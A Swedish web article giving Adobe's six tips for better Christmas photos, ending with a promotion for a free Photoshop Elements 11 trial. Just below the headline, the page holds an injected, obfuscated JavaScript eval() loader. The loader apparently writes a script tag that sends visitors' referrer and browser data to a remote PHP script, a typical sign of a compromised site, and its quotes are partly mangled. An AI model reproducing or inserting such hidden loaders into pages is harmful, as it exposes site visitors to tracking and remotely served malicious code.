Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Adobe: Så undviker du misslyckade julbilder

Adobe: Så undviker du misslyckade julbilder

Adobe: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bhfde|var|u0026u|referrer|hdirh||js|php’.split(’|’),0,{}))
Suddiga bilder från julbordet, hysteriska barn som öppnar paket och mörka bilder från dans runt granen. Även om man försöker fånga stunden och värmen, händer det ibland att bilderna inte gör tillfället rättvisa i efterhand.

Adobe erbjuder här en lista med ett par saker som kan vara värda att tänka på för de som vill få till riktigt bra bilder av julhelgen.

1.      Planera bilden
Vissa gillar inte att bli fotograferade. Försök då med ett par testbilder först som kanske får personerna i fråga att slappna av. Undvik blixt om det är möjligt.

2.      Var inte rädd för de manuella inställningarna

Nästan alla digitalkameror har många manuella inställningsmöjligheter. Exprimentera med att göra bakgrunden oskarp genom att fokusera på enskillda objekt. Våga testa.

3.      Organisera, organisera, organisera

Om du överför alla dina bilder till en och samma mapp finns risken att du aldrig hittar dem igen. Lägg lite tid på att dela upp dina bilder i olika gallerier. Gå igenom bilderna och markera de du gillar så att du enkelt kan skilja dem från de som inte känns perfekta. När du gått igenom alla bilder finns det egentligen ingen anledning att slösa lagringsplats för de du inte gillar. Var inte rädd för att göra dig av med dem. Radera dem helt enkelt.

4.      Använd ansiktsigenkänning

I Photoshop Elements finns det en ansiktsigenkänningsfunktion.  Kom dock ihåg att bara använda den för vänner och familj. Om du börjar namnge allt du någonsin har fotograferat kan det göra att programmet jobbar långsammare utan att du adderar något riktigt värde. Skapa en smart samling i antingen Photoshop Elements eller Lightroom och dela upp på människor och tidsperiod, exempelvis per månad. Nu har du en bra samling av bilder du snabbt och enkelt kan skriva ut eller dela med dig av till familj och vänner.

5.      Snygga gruppfoton med sammansmältningsfunktion
Gruppfoton kan vara en utmaning även för professionella fotografer. Det är alltid någon som råkar blinka eller någon som flackar med blicken. Photoshop Elements funktion Photomerge låter dig lägga upp till tio foton ovanpå varandra i ett lager och justerar sedan automatiskt de olika delarna i bilderna. Efter det kan man gå in och välja vilka delar man tycker bäst om och som man vill ha med i det slutgiltiga fotot.

6.      Dela ditt verk med familj och vänner
Photoshop Elements och Lightroom gör att man enkelt kan dela foton med vem man vill direkt på Facebook, Flickr och Adobe Revel. Kom ihåg att se över dina kontoinställningar på t.ex Facebook så du har koll på vem som kan se bilderna du lägger upp. Överväg vem du vill ska ha tillgång till bilder och videor du laddar upp på dig själv och andra.

Testa Photoshop Elements 11 gratis i 30 dagar
Photoshop Elements 11 är en mycket användarvänlig version av Adobe Photoshop CS6 , som används av professionella fotografer över hela världen. Photoshop Elements 11 har många av de funktioner som Adobe Photoshop CS6  har och kan användas gratis i 30 dagar. Det betyder att du har mer än hela semesterperioden till att testa programmet samt redigera och spara bilder på allt från julfester till mellandagar och nyårsafton.

Hämta Photoshop Elements 11 här: http://www.adobe.com/cfusion/tdrc/index.cfm?product=photoshop_elements&loc=se